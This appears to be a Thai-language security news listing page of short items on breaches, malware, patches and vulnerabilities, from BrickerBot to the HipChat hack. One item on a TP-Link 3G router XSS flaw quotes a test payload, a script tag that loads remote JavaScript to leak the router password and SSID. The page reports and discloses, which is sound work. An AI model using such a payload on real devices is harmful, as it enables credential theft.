Tags:
Node Thumbnail

เบราว์เซอร์โครมของกูเกิลประกาศนโยบายการเตือนผู้ใช้เมื่อเชื่อมต่อเว็บโดยไม่ได้เข้ารหัส (HTTP) ว่าไม่ปลอดภัยเพิ่มเติม จากตอนนี้ที่จะขึ้นเตือน "Not Secure" ทุกครั้งที่เว็บมีแบบฟอร์มรหัสผ่านหรือหมายเลขบัตรเครดิต โดยจะเพิ่มมาตรการใหม่ในเวอร์ชั่น 62

โครม 62 จะเตือนผู้ใช้ทุกครั้งมีผู้ใช้พิมพ์ข้อความใดๆ ลงเว็บ แถบ URL จะเด้งเตือนว่าเว็บนี้เป็นเว็บไม่ปลอดภัย

โครม 62 มีกำหนดออกในช่วงเดือนตุลาคม 2017 ผู้ดูแลเว็บมีเวลาประมาณห้าเดือนในการปรับตัว

Tags:
Node Thumbnail

ปัญหาอุปกรณ์ IoT ที่ความปลอดภัยต่ำ มักใช้ซอฟต์แวร์เก่าหลายปี กำลังสร้างความเสียหายให้กับอินเทอร์เน็ตอย่างต่อเนื่องในช่วงปีที่ผ่านมาจากการที่กลุ่มแฮกเกอร์ใช้อุปกรณ์เหล่านี้เป็น botnet เพื่อยิงทราฟิกไปยังบริการอื่นๆ จนล่มครั้งใหญ่ๆ หลายครั้ง เช่นการโจมตี Dyn ตอนนี้ก็มีมัลแวร์ BickerBot เริ่มอาละวาดในอินเทอร์เน็ต โดยความพิเศษของมันคือเมื่อติดอุปกรณ์ตัวไหนแล้ว มันจะ "ทำลาย" อุปกรณ์ตัวนั้นเสียด้วยการเขียนข้อมูลสุ่มลงระบบไฟล์ทำให้อุปกรณ์บูตไม่ขึ้นอีก

Radware รายงานว่าเดือนที่ผ่านมา BickerBot ปรากฎตัวออกมาแล้วถึงสี่รุ่น แต่ละรุ่นปรับกระบวนการทำงานไปเล็กน้อย แต่แนวคิดคงเดิมคือเขียนข้อมูลให้ระบบไฟล์พังแล้วตัดการเชื่อมต่ออินเทอร์เน็ต

Tags:
Node Thumbnail

Webroot ผู้ผลิตโปรแกรมป้องกันไวรัสออกอัพเดตผิดพลาด จับไฟล์ของวินโดวส์รุ่น Insider Preview หลายร้อยไฟล์ว่าเป็นโทรจัน พร้อมกับย้ายไปเขตกักกันไฟล์

นอกจากการย้ายไฟล์วินโดวส์แล้ว อัพเดตนี้ยังแจ้งเตือนเฟซบุ๊กว่าเป็นเว็บฟิชชิ่งอีกด้วย

ทาง Webroot แจ้งว่าไฟล์อัพเดตปล่อยออกมาผิดพลาดเป็นเวลา 13 นาที และตอนนี้เว็บได้แจ้งวิธีแก้ไขออกมาแล้ว

Tags:
Node Thumbnail

HipChat บริการแชทภายในทีม (คู่แข่งของ Slack) จากบริษัท Atlassian ผู้พัฒนา Jira/Bitbucket ประกาศพบร่องรอยการถูกแฮ็กเซิร์ฟเวอร์ โดยช่องโหว่มาจากทางไลบรารียอดนิยมที่ HipChat เรียกใช้งานอีกทีหนึ่ง

Atlassian ประกาศยกเลิกรหัสผ่านของผู้ใช้ที่เชื่อมต่อทั้งหมดทันที และบังคับให้ผู้ใช้ต้องรีเซ็ตรหัสผ่านใหม่ บริษัทคาดว่าแฮ็กเกอร์ได้ข้อมูลของผู้ใช้ทุกรายคือ username, email, รหัสผ่านที่ hash แล้ว (bcrypt/salt) และมีข้อมูลการแช็ทบางส่วน (น้อยกว่า 0.05%) ถูกนำออกไปด้วย

Atlassian ยืนยันว่าไม่พบหลักฐานใดๆ ที่บ่งชี้ว่าแอพตัวอื่นของบริษัทได้รับผลกระทบจากการแฮ็กครั้งนี้ด้วย

Tags:
Node Thumbnail

กลุ่มแฮกเกอร์ Shadow Broker เคยออกมาขอเงิน 1 ล้านดอลลาร์เพื่อแลกกับชุดเครื่องมือที่น่าจะเป็นของ NSA แต่ปรากฎว่าไม่มีใครยอมจ่ายทำให้ทางกลุ่มปล่อยเครื่องมือออกมาฟรี และตอนนี้ก็เริ่มมีแฮกเกอร์ใช้เครื่องมือเหล่านี้แฮกเครื่องที่ต่ออินเทอร์เน็ตเป็นวงกว้างแล้ว

มัลแวร์ DoublePulsar ทำงานในแรมทั้งหมดทำให้มัลแวร์หายไปเมื่อบูตเครื่อง แต่การนำมัลแวร์ไปรันต้องอาศัยช่องโหว่อื่น ซึ่งไมโครซอฟท์แพตช์ไปก่อนแล้ว ชุดแฮกสำคัญเช่น EternalBlue ถูกแพตช์ไปแล้วเมื่อเดือนมีนาคมที่ผ่านมา แต่เซิร์ฟเวอร์จำนวนมากยังคงไม่ยอมอัพเดตทำให้ยังคงเป็นเหยื่อต่อเครื่องมือเหล่านี้ได้

Tags:
Node Thumbnail

การโจมตีธนาคารด้วยการปลอมโดเมนเพื่อหลอกให้ลูกค้าใส่รหัสผ่านคงเป็นเรื่องที่เราพบเจอกันเรื่อยๆ ที่งาน Kaspersky Security Summit ทาง Kaspersky ก็รายงานถึงธนาคารแห่งหนึ่งในบราซิลที่ถูกขโมยโดเมนจริงของธนาคารไปถึง 5 ชั่วโมง ในช่วงวันที่ 22 ตุลาคมปีที่แล้ว

รายงานไม่ระบุชื่อธนาคารแต่ระบุว่าเป็นธนาคารขนาดใหญ่ มีทรัพย์สินรวม 25,000 ล้านดอลลาร์สหรัฐฯ, ลูกค้ากว่า 5 ล้านคน, และจำนวนสาขา 500 สาขา

Tags:
Node Thumbnail

ออราเคิลปล่อยแพตช์ประจำไตรมาสที่สองของปี ตามนโยบายการออกแพตช์ปีละสี่รอบของบริษัท โดยรอบนี้มีช่องโหว่ได้รับการแก้ไขรวม 299 รายการ กระจายไปตามรายการซอฟต์แวร์ต่างๆ แต่รายการช่องโหว่ระดับวิกฤติ มักมาจากช่องโหว่ของ Struts 2 หลายสิบรายการ

สำหรับช่องโหว่จาวาที่ร้ายแรงที่สุดเป็น CVE-2017-3512 และ CVE-2017-3514 ในส่วน AWT, ส่วน Solaris มีช่องโหว่ระบบร้ายแรงสูงสุด 1 รายการในส่วน Kernel RPC

MySQL นั้นตัวเซิร์ฟเวอร์มีช่องโหว่คะแนน CVSS สูงสุดที่ 7.7 แต่สำหรับคนใช้รุ่น Enterprise อาจจะต้องระวังกว่าเพราะตัว Monitoring ได้รับผลกระทบจาก Struts 2 ทำให้มีช่องโหว่คะแนน 10.0 อีกหนึ่งรายการ

Tags:
Node Thumbnail

InterContinental Hotel Group (IHG) ได้ว่าโรงแรมที่ได้รับผลกระทบจากการถูกมัลแวร์ขโมยข้อมูลบัตรเครดิต มีจำนวนถึง 1,200 แห่ง จากรายงานก่อนหน้าที่กล่าวว่ามีเพียง 12 แห่ง ซึ่งเป็นโรงแรมของแบรนด์ในเครือทั้งหมดที่อยู่ในอเมริกา เช่น Holiday Inn, Kimpton, Hotel Indigo ฯลฯ จากโรงแรมในเครือทั้งหมดที่อยู่ในอเมริกากว่า 3,925 แห่ง

Tags:
Node Thumbnail

เฟซบุ๊กเปิดตัวบริการ Delegated Recovery ซึ่งเป็นบริการหรือเครื่องมือสำหรับกู้บัญชีผ่านโปรโตคอลของเฟซบุ๊ก แทนการใช้งาน SMS หรืออีเมลในแบบเดิมเมื่อเดือนมกราคมที่ผ่านมา โดยเปิดให้กู้เฉพาะบน Github ก่อนเท่านั้น

ล่าสุดในงาน F8 เฟซบุ๊กประกาศปล่อยทั้ง SDKs, แนวทางและตัวอย่างการใช้งาน ให้กับบริษัทหรือเว็บไซต์ทั่วไปที่สนใจนำไปทดลองใช้งานแล้ว ทั้งภาษา Java และสำหรับแพลตฟอร์ม NodeJS

Tags:
Node Thumbnail

การเปิดใช้งานตัวอักษร unicode ในโดเมนเปิดทางให้การโจมตี phishing ทำได้แนบเนียนขึ้นเรื่อยๆ ปัญหาสำคัญเช่น อักษรซีริลลิก (Cyrillic) ที่มีตัวอักษรเหมือนกับตัวละตินในภาษาอังกฤษหลายตัว ทำให้สามารถปลอมโดเมนได้อย่างแนบเนียน

Xudong Zheng รายงานปัญหานี้ตั้งแต่สัปดาห์ที่แล้ว ระบุว่าบนเครื่องบางเครื่องที่ฟอนต์ตรงกัน การปลอมโดเมนด้วยอักษรซีริลลิก ทำให้ผู้ใช้ไม่สามารถแยกระหว่างโดเมนจริงกับโดเมนปลอมได้เลย

Tags:
Node Thumbnail

Defense Code รายงานช่องโหว่ของระบบอีคอมเมิร์ช Magento ที่ได้รับความนิยมเป็นอย่างสูงรวมถึงในบ้านเราเอง โดยระบบพรีวิววิดีโอจาก Vimeo จะดาวน์โหลดภาพสินค้าตัวอย่างเสมอ และแม้ว่าตัวซอฟต์แวร์จะตรวจสอบไฟล์ที่กำลังดาวน์โหลดว่าเป็นภาพจริงหรือไม่ แต่ก็ดาวน์โหลดไฟล์เสมอแม้จะผิดพลาดก็ตามทำให้แฮกเกอร์ทำโค้ดไปวางบนเซิร์ฟเวอร์ของเหยื่อได้

ตัวช่องโหว่นี้จำกัดเฉพาะผู้มีสิทธิโพสและพรีวิววิดีโอจาก Vimeo ซึ่งก็น่าจะเป็นคนที่มีสิทธิ์โพสสินค้าได้เท่านั้น (รายงานระบุว่าผู้ที่เข้าถึงหน้า admin ทุกคนใช้งานได้) แต่ Defense Code ก็เตือนว่าแฮกเกอร์สามารถล่อให้เหยื่อเรียก URL นี้ขึ้นมาด้วยการทำ cross-site request forgery (CSRF) ได้

Tags:
Node Thumbnail

Airbnb เจอปัญหาผู้ใช้ถูกขโมยบัญชีมากขึ้นเรื่อยๆ ในช่วงหลัง หลังจากที่พยายามทำระบบตรวจจับความเสี่ยงภายใน ตอนนี้ทาง Airbnb ก็หันมาใช้การยืนยันตัวตนหลายขั้นตอนด้วย SMS แล้ว

การส่ง SMS ของ Airbnb จะไม่ส่งบ่อยๆ เหมือนการทำธุรกรรมธนาคารที่เราพบกัน แต่จะจำไว้ว่าเราเคยใช้อุปกรณ์ใดล็อกอินเข้าแอปบ้าง หากเป็นอุปกรณ์ใหม่ก็จะส่งรหัสทาง SMS หรืออีเมล หลังจากนั้นจะสามารถล็อกอินด้วยอุปกรณ์เดิมต่อไปได้เรื่อยๆ

ที่มา - Airbnb

Tags:
Node Thumbnail

Jan Hörsch จากบริษัท Securai รายงานช่องโหว่ของเราท์เตอร์ 3G ของ TP-Link รุ่น M5350 ที่มีช่องโหว่ cross-site scripting (XSS) เปิดทางให้แฮกเกอร์สามารถยิงโค้ดจาวาสคริปต์ขึ้นไปรันได้

นักวิจัยทดสอบด้วยการยิง SMS <script src=//n.ms/a.j></script> เพื่อให้เราท์เตอร์นำโค้ดขึ้นไปรัน จากนั้นตัวสตริปต์จะส่ง SMS กลับมาเป็นรหัสผ่านและ SSID ของตัวเราท์เตอร์

เฟิร์มแวร์ที่พบช่องโหว่ออกมาตั้งแต่มกราคม 2015 รายงานครั้งเดียวกัน Hörsch ยังระบุถึงสินค้าตัวอื่นๆ เช่น Panasonic Retinascanner ที่มีช่องโหว่ในหน้าเว็บ และผู้ผลิตระบุเพียงว่าสินค้าเลิกผลิตและหมดอายุซัพพอร์ตไปแล้ว

Tags:
Node Thumbnail

NIST เปิดตัวมาตรการการเข้ารหัสแบบรักษาฟอร์แมตข้อมูล (Format-Preserving Encryption - FPE) มาตั้งแต่ปีที่แล้ว ตอนนี้ทาง HPE ประกาศว่าโซลูชั่น SecureData ของบริษัทเป็นโซลูชั่นแรกที่ได้รับการรับรอง (validated) ตามมาตรฐานนี้

HPE SecureData with Hyper FPE ใช้กระบวนวิธีเข้ารหัสแบบ AES-FF1 เป็นหนึ่งในสามกระบวนวิธีที่มาตรฐานของ NIST รับรองให้ใช้งาน

ทาง HPE ระบุว่าบริษัทได้รับการรับรองจาก NIST ตั้งแต่วันที่ 13 เมษายนที่ผ่านมา ผมเองตรวจสอบรายชื่อในเว็บของ NIST ยังไม่พบ แต่หากไม่มีอะไรผิดพลาดก็น่าจะมีรายการสินค้าที่ได้รับการรับรองเร็วๆ นี้

Tags:
Node Thumbnail

Elena Kovakina พนักงานในทีมความปลอดภัย Android ของกูเกิล ไปพูดที่งานสัมมนาของ Kaspersky เล่าว่ากูเกิลเก็บรวบรวม ransomware บน Android กว่า 50,000 ตัวอย่าง (คิดเป็น 30 ตระกูลมัลแวร์) เพื่อนำไปศึกษาพฤติกรรมของมันว่าทำงานอย่างไร

สิ่งที่กูเกิลสนใจคือ ransomware เหล่านี้มีพฤติกรรมอย่างไร เจาะเข้ามาทาง API ตัวไหน เพื่อว่ากูเกิลจะได้อุดช่องโหว่เหล่านั้น และที่ผ่านมา ระบบความปลอดภัยของ Android ก็พัฒนาขึ้นเพราะการศึกษามัลแวร์เหล่านี้ด้วย

Elena บอกว่าเป้าหมายของกูเกิลคือทำให้ต้นทุนการพัฒนามัลแวร์มีราคาแพงขึ้น ทำได้ยากขึ้น (making malware for Android should be hard) เพื่อลดแรงจูงใจของแฮ็กเกอร์ผู้สร้างมัลแวร์ลง เนื่องจากไม่คุ้มค่าเหนื่อย

Tags:
Node Thumbnail

ระบบการออกใบรับรองการเข้ารหัสเว็บทุกวันนี้ ความน่ากลัวอย่างหนึ่งคือเมื่อมี root CA เพิ่มเข้ามาแล้ว root CA นั้นจะออกใบรับรองให้กับโดเมนใดๆ ก็ได้ ทั้งที่จริงๆ แล้วฟีเจอร์หนึ่งของใบรับรองสำหรับ CA คือ Name Constraints สามารถกำหนดโดเมนที่ CA จะออกโดเมนได้แต่ก็ไม่มีใครสนใจใช้งานจริงจังนัก

Tags:
Node Thumbnail

SWIFT ผู้ให้บริการระบบส่งข้อความระหว่างธนาคาร ซึ่งปัจจุบันระบบนี้ถูกใช้เพื่อโอนเงินนับล้านล้านดอลลาร์ต่อวัน เตรียมเปิดตัวเครื่องมือใหม่เพื่อตรวจจับข้อความหลอกลวง เพื่อเรียกคืนความเชื่อมั่น หลังจากที่มีข่าวธนาคารถูกโจมตีผ่านระบบและเงินหายไปนับล้านดอลลาร์

ระบบใหม่ของ SWIFT จะมีการเรียนรู้แพทเทิร์นการส่งข้อความของธนาคารผู้ใช้งานระบบดังกล่าว ดังนั้นตัวระบบสามารถตรวจจับได้ทันทีเมื่อพบเห็นสิ่งที่ผิดปกติ

Tags:
Node Thumbnail

Project Zero ของกูเกิลเขียนรายงานการเจาะเฟิร์มแวร์ Broadcom Wi-Fi SoC ที่ใช้งานอยู่ใน Nexus 6P แสดงให้เห็นว่าแฮกเกอร์สามารถแฮกเครื่องจากระยะไกล ด้วยการสร้างแพ็กเก็ต Wi-Fi เพื่อเจาะทะลุตัวเฟิร์มแวร์ เมื่อควบคุมตัวเฟิร์มแวร์ของชิป Wi-Fi ได้แล้วจึงเจาะทะลุเข้าเคอร์เนลอีกชั้นหนึ่ง ทำให้เข้าควบคุมเครื่องของเหยื่อได้อย่างสมบูรณ์

ช่องโหว่นี้ถูกแก้ไขแล้วในอัพเดตเดือนเมษายนที่ผ่านมา (สำหรับ Nexus ที่ยังซัพพอร์ตอยู่เท่านั้น)

Tags:
Node Thumbnail

Wonga ผู้ให้บริการกู้เงินระยะสั้นได้ประกาศว่า ทางบริษัทถูกแฮกเว็บไซต์และพบว่ามีข้อมูลที่รั่วไหลออกมาเป็นจำนวนมาก กระทบกับผู้ใช้กว่า 245,000 คนในสหราชอาณาจักร และ 25,000 คนในโปแลนด์ ซึ่งตอนนี้ได้ส่งอีเมลแจ้งเตือนผู้ใช้ที่มีความเสี่ยงที่จะถูกขโมยข้อมูล รวมถึงขึ้นข้อมูลในเว็บไซต์เพื่อประกาศการถูกแฮกข้อมูลแล้ว

สำหรับข้อมูลที่หลุดจากเว็บไซต์ Wonga ก็มีทั้งชื่อ, ที่อยู่อีเมล, ที่อยู่บ้าน, เบอร์โทรศัพท์, รหัส 4 ตัวท้ายของบัตร, เลขบัญชีธนาคาร และ sort code ซึ่งตอนนี้ Wonga เชื่อว่ารหัสผ่านไม่น่าจะหลุดไปด้วย แต่ก็แจ้งเตือนให้ผู้ใช้รีบเปลี่ยนรหัสทันที และเตือนว่าผู้ใช้ที่ตกอยู่ในความเสี่ยงนั้นควรจะระมัดระวังตัว รวมถึงแจ้งเรื่องดังกล่าวไปยังธนาคารแล้วเช่นกัน

Tags:
Topics: 
Node Thumbnail

ความปลอดภัยไซเบอร์เริ่มเข้าไปเกี่ยวข้องกับระบบควบคุมมากขึ้นเรื่อยๆ เช่น ระบบควบคุมโครงการพื้นฐานอย่างไฟฟ้าและประปา ล่าสุดการระบบเตือนภัยเมืองดัลลัสก็ตกเป็นเหยื่อของการบุกรุกไซเบอร์ เมื่อระบบถูกแฮกจนไซเรน 156 ตัวสำหรับการแจ้งเตือนทอร์นาโดดังขึ้นพร้อมกันทั่วเมือง

ทางโฆษกระบุว่ายังไม่สามารถให้รายละเอียดได้ แต่บอกเพียงว่าระบบถูกแฮกตั้งแต่วันศุกร์ที่ผ่านมา และกำลังทำงานร่วมกับหน่วยงานอื่น เช่น FCC เพื่อหาต้นตอของการบุกรุกต่อไป

ไซเรนดังขึ้นช่วงก่อนเที่ยงคืน และเจ้าหน้าที่ปิดไซเรนได้สำเร็จหลังตีหนึ่ง โดยต้องปิดระบบแจ้งเตือนทั้งระบบ ตอนนี้เจ้าหน้าที่กำลังหาทางเปิดระบบแจ้งเตือนให้กลับมาทำงานอีกครั้ง

Tags:
Node Thumbnail

หลังจาก Blognone เคยนำเสนอรายงานสำรวจการเปิดใช้งาน HTTPS ในไทย ประจำปีปี 2016 ไป ขณะนี้ผ่านมาหนึ่งปีกว่าๆ แล้ว ก็สมควรถึงเวลาที่จะสำรวจติดตามผลกันอีกครั้ง

รอบนี้เราขยายจำนวนเว็บที่สนใจให้มากขึ้นกว่าเดิม แต่ยังคงตามติดเว็บเดิมที่เคยสำรวจไว้อย่างครบถ้วนครับ

Tags:
Node Thumbnail

เมื่อเดือนกันยายนปีที่แล้ว อินเทลประกาศขายหุ้น 51% ใน Intel Security ให้กับบริษัทลงทุน TPG ส่งผลให้ Intel Security หรือ McAfee เดิม ไม่ได้มีสถานะเป็นบริษัทลูกของอินเทลอีกต่อไป (แต่อินเทลยังถือหุ้นอยู่ 49%)

วันนี้กระบวนการเปลี่ยนผ่านเสร็จสิ้นแล้ว ส่งผลให้ McAfee กลับมาเกิดใหม่อีกครั้งในฐานะบริษัทอิสระ (standalone company) โดยมีชื่ออย่างเป็นทางการว่า McAfee, LLC

ผลิตภัณฑ์และบริการทั้งหมดของ McAfee ยังเหมือนเดิม สิ่งที่ต่างไปคือโลโก้ใหม่ ยังเป็นรูปโล่สีแดงคล้ายของเดิม แต่เปลี่ยนจากโล่ทรงโค้งมีโลโก้รูปตัว M มาเป็นโล่ทรงเหลี่ยมที่ดูเป็นอักษร M แทน

Tags:
Node Thumbnail

IBM Security ออกรายงานสรุปสถานการณ์ความปลอดภัยของปี 2016 ผลพบว่าการเติบโตของข้อมูลหลุด (data breach) เพิ่มสูงเป็นประวัติการณ์ จำนวนข้อมูลที่ถูกเจาะออกมาเผยแพร่เพิ่มจาก 600 ล้านรายการในปี 2015 มาเป็น 4 พันล้านรายการในปี 2016 (โตถึง 566% ภายในปีเดียว)

ข้อมูลที่ถูกเจาะมีทั้งข้อมูลแบบเดิมๆ อย่างรหัสผ่าน เลขบัตรเครดิต ข้อมูลสุขภาพ แต่อาชญากรไซเบอร์ก็หันมาเจาะข้อมูลประเภทใหม่ๆ เช่น บันทึกอีเมลเก่าๆ เอกสารทางธุรกิจ ทรัพย์สินทางปัญญา และซอร์สโค้ดของซอฟต์แวร์ที่ใช้ภายในองค์กรด้วย

Tags:
Node Thumbnail

บริษัทประกันภัย AIG หันมาเปิดบริการประกันภัยไซเบอร์ ครอบคลุมตั้งแต่การคุกคามออนไลน์ (online bully) การขู่เรียกเงินค่าไถ่ ไปจนถึงภัยไซเบอร์แบบอื่นๆ

บริการ Family CyberEdge เปิดให้กับลูกค้าระดับสูง (Private Client Group) เท่านั้น โดยบริการลูกค้ากลุ่มนี้มักมีบริการเฉพาะ เช่น การประกันไวน์หรืองานศิลปะมูลค่าสูงๆ

นอกจากการประกันความเสียหายแล้ว บริการนี้ยังเข้าตรวจสอบอุปกรณ์อิเล็กทรอนิกส์ในบ้าน, มอนิเตอร์ความปลอดภัย, และรวมค่าบริการในการกู้คืนข้อมูล

บริษัทประกันที่เปิดกรมธรรม์สำหรับภัยไซเบอร์นั้นมีมาก่อนหน้านี้แล้ว เช่น Munich Re CyberOne ที่คุ้มครองความเสียหายตั้งแต่ 25,000 ถึง 50,000 ดอลลาร์ต่อเบี้ยประกัน 100 ดอลลาร์

Tags:
Node Thumbnail

พบกันเป็นประจำทุกต้นเดือนครับ กูเกิลออกแพตช์ความปลอดภัย Android ประจำเดือนเมษายน 2017 รอบนี้แพตช์มี 2 ชุด ได้แก่ชุด 1 เม.ย. สำหรับพาร์ทเนอร์ที่ต้องการอุดช่องโหว่ก่อน และชุด 5 เม.ย. ที่เป็นแพตช์ชุดสมบูรณ์ (แพตช์ตัวนี้จะรวมเอาแพตช์ 1 เม.ย. มาด้วย)

สำหรับแพตช์ 1 เม.ย. แก้ช่องโหว่ด้านความปลอดภัย 23 จุด (CVE) เป็นระดับร้ายแรง (critical) 6 จุด ส่วนแพตช์ 5 เม.ย. แก้เพิ่มอีก 79 จุด ส่วนมากแก้ปัญหาช่องโหว่บนไดรเวอร์ของผู้ผลิตฮาร์ดแวร์อย่าง Qualcomm, Broadcom, MediaTek, Synaptics และ NVIDIA

ผลิตภัณฑ์ในกลุ่ม Pixel/Nexus ที่ได้รับแพตช์ จะมีดังนี้ครับ

Pages